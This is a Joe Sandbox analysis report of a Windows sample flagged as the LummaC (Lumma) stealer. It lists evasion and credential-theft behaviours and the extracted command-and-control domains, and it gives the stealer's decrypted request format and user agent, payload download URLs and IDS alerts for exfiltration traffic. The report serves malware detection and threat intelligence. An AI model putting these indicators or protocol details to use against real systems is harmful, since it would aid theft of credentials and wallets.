Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1559919
MD5:4658dfd86a5c61df7f4dc30347017718
SHA1:2e998b513681d11bfe238b4dd95849bc78fc8296
SHA256:970d268afd9c4051c591faa72ba2da6351852ec16ba8f664bb5813a0238ea243
Tags:exeuser-Bitsight
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Creates a process in suspended mode (likely to inject code)
Downloads executable code via HTTP
Entry point lies outside standard sections
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • file.exe (PID: 1600 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 4658DFD86A5C61DF7F4DC30347017718)
    • chrome.exe (PID: 1208 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
      • chrome.exe (PID: 2120 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=2020,i,15066191310889965493,6734500670123493678,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
    • chrome.exe (PID: 7484 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
      • chrome.exe (PID: 7672 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=2008,i,11137698376762486323,5584479856548226272,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["peepburry828.sbs", "3xp3cts1aim.sbs", "processhol.sbs", "p10tgrace.sbs", "p3ar11fter.sbs"], "Build id": "LOGS11--LiveTraffic"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    SourceRuleDescriptionAuthorStrings
    00000000.00000003.2317895828.0000000001283000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      Process Memory Space: file.exe PID: 1600JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
        Process Memory Space: file.exe PID: 1600JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: file.exe PID: 1600JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
            decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
              No Sigma rule has matched
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-21T06:23:14.463005+010020283713Unknown Traffic192.168.2.649710188.114.97.3443TCP
              2024-11-21T06:23:16.596064+010020283713Unknown Traffic192.168.2.649711188.114.97.3443TCP
              2024-11-21T06:23:18.984401+010020283713Unknown Traffic192.168.2.649713188.114.97.3443TCP
              2024-11-21T06:23:21.307087+010020283713Unknown Traffic192.168.2.649719188.114.97.3443TCP
              2024-11-21T06:23:23.834009+010020283713Unknown Traffic192.168.2.649726188.114.97.3443TCP
              2024-11-21T06:23:26.897012+010020283713Unknown Traffic192.168.2.649732188.114.97.3443TCP
              2024-11-21T06:23:29.725841+010020283713Unknown Traffic192.168.2.649740188.114.97.3443TCP
              2024-11-21T06:23:34.813514+010020283713Unknown Traffic192.168.2.649758188.114.97.3443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-21T06:23:15.248039+010020546531A Network Trojan was detected192.168.2.649710188.114.97.3443TCP
              2024-11-21T06:23:17.336101+010020546531A Network Trojan was detected192.168.2.649711188.114.97.3443TCP
              2024-11-21T06:23:35.529014+010020546531A Network Trojan was detected192.168.2.649758188.114.97.3443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-21T06:23:15.248039+010020498361A Network Trojan was detected192.168.2.649710188.114.97.3443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-21T06:23:17.336101+010020498121A Network Trojan was detected192.168.2.649711188.114.97.3443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-21T06:23:14.463005+010020577311Domain Observed Used for C2 Detected192.168.2.649710188.114.97.3443TCP
              2024-11-21T06:23:16.596064+010020577311Domain Observed Used for C2 Detected192.168.2.649711188.114.97.3443TCP
              2024-11-21T06:23:18.984401+010020577311Domain Observed Used for C2 Detected192.168.2.649713188.114.97.3443TCP
              2024-11-21T06:23:21.307087+010020577311Domain Observed Used for C2 Detected192.168.2.649719188.114.97.3443TCP
              2024-11-21T06:23:23.834009+010020577311Domain Observed Used for C2 Detected192.168.2.649726188.114.97.3443TCP
              2024-11-21T06:23:26.897012+010020577311Domain Observed Used for C2 Detected192.168.2.649732188.114.97.3443TCP
              2024-11-21T06:23:29.725841+010020577311Domain Observed Used for C2 Detected192.168.2.649740188.114.97.3443TCP
              2024-11-21T06:23:34.813514+010020577311Domain Observed Used for C2 Detected192.168.2.649758188.114.97.3443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-21T06:23:37.067847+010020197142Potentially Bad Traffic192.168.2.649762185.215.113.1680TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-21T06:23:12.890564+010020577301Domain Observed Used for C2 Detected192.168.2.6607701.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-21T06:23:19.870507+010020480941Malware Command and Control Activity Detected192.168.2.649713188.114.97.3443TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: file.exeAvira: detected
              Source: https://cook-rain.sbs/apiDAvira URL Cloud: Label: malware
              Source: http://185.215.113.16/steam/random.exeNnAvira URL Cloud: Label: phishing
              Source: https://cook-rain.sbs/zSUu%Avira URL Cloud: Label: malware
              Source: https://cook-rain.sbs/38eAvira URL Cloud: Label: malware
              Source: https://cook-rain.sbs/apiYAvira URL Cloud: Label: malware
              Source: https://cook-rain.sbs/apiz/Avira URL Cloud: Label: malware
              Source: https://cook-rain.sbs/$Avira URL Cloud: Label: malware
              Source: http://185.215.113.16/off/def.exe1Avira URL Cloud: Label: phishing
              Source: https://cook-rain.sbs/cg/m5VAvira URL Cloud: Label: malware
              Source: http://185.215.113.16/&Avira URL Cloud: Label: phishing
              Source: file.exe.1600.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["peepburry828.sbs", "3xp3cts1aim.sbs", "processhol.sbs", "p10tgrace.sbs", "p3ar11fter.sbs"], "Build id": "LOGS11--LiveTraffic"}
              Source: https://cook-rain.sbs/apiDVirustotal: Detection: 8%Perma Link
              Source: file.exeReversingLabs: Detection: 47%
              Source: file.exeJoe Sandbox ML: detected
              Source: 00000000.00000003.2186840845.0000000004F70000.00000004.00001000.00020000.00000000.sdmpString decryptor: p3ar11fter.sbs
              Source: 00000000.00000003.2186840845.0000000004F70000.00000004.00001000.00020000.00000000.sdmpString decryptor: 3xp3cts1aim.sbs
              Source: 00000000.00000003.2186840845.0000000004F70000.00000004.00001000.00020000.00000000.sdmpString decryptor: peepburry828.sbs
              Source: 00000000.00000003.2186840845.0000000004F70000.00000004.00001000.00020000.00000000.sdmpString decryptor: p10tgrace.sbs
              Source: 00000000.00000003.2186840845.0000000004F70000.00000004.00001000.00020000.00000000.sdmpString decryptor: processhol.sbs
              Source: 00000000.00000003.2186840845.0000000004F70000.00000004.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
              Source: 00000000.00000003.2186840845.0000000004F70000.00000004.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
              Source: 00000000.00000003.2186840845.0000000004F70000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
              Source: 00000000.00000003.2186840845.0000000004F70000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
              Source: 00000000.00000003.2186840845.0000000004F70000.00000004.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
              Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
              Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
              Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
              Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49709 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49710 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49711 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.6:49712 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49713 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49719 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49720 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49726 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49732 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.6:49738 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49740 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49758 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.6:49760 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49775 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.6:49814 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49818 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49824 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.6:49884 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49902 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.6:49932 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49986 version: TLS 1.2
              Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: file.exe, 00000000.00000003.2496620325.00000000083A0000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2602668272.00000000062B2000.00000040.00000800.00020000.00000000.sdmp

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2057730 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cook-rain .sbs) : 192.168.2.6:60770 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2057731 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) : 192.168.2.6:49710 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2057731 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) : 192.168.2.6:49719 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2057731 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) : 192.168.2.6:49711 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2057731 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) : 192.168.2.6:49713 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2057731 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) : 192.168.2.6:49740 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2057731 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) : 192.168.2.6:49732 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2057731 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) : 192.168.2.6:49726 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2057731 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) : 192.168.2.6:49758 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49713 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49711 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49711 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49758 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49710 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49710 -> 188.114.97.3:443
              Source: Malware configuration extractorURLs: peepburry828.sbs
              Source: Malware configuration extractorURLs: 3xp3cts1aim.sbs
              Source: Malware configuration extractorURLs: processhol.sbs
              Source: Malware configuration extractorURLs: p10tgrace.sbs
              Source: Malware configuration extractorURLs: p3ar11fter.sbs
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 21 Nov 2024 05:23:36 GMTContent-Type: application/octet-streamContent-Length: 2772480Last-Modified: Thu, 21 Nov 2024 05:10:53 GMTConnection: keep-aliveETag: "673ec0dd-2a4e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 c0 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 2b 00 00 04 00 00 e4 bc 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 6a 62 6a 65 6d 71 6d 65 00 00 2a 00 00 a0 00 00 00 ec 29 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 70 6c 6f 65 6d 75 76 78 00 20 00 00 00 a0 2a 00 00 06 00 00 00 26 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 c0 2a 00 00 22 00 00 00 2c 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
              Source: Joe Sandbox ViewIP Address: 13.107.246.45 13.107.246.45
              Source: Joe Sandbox ViewIP Address: 185.215.113.16 185.215.113.16
              Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
              Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
              Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49710 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49719 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49711 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49732 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49740 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49713 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49726 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49758 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.6:49762 -> 185.215.113.16:80
              Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
              Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
              Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
              Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
              Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
              Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
              Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
              Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
              Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
              Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
              Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
              Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
              Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
              Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
              Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
              Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
              Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
              Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
              Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
              Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
              Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
              Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
              Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
              Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
              Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
              Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
              Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
              Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
              Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
              Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
              Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
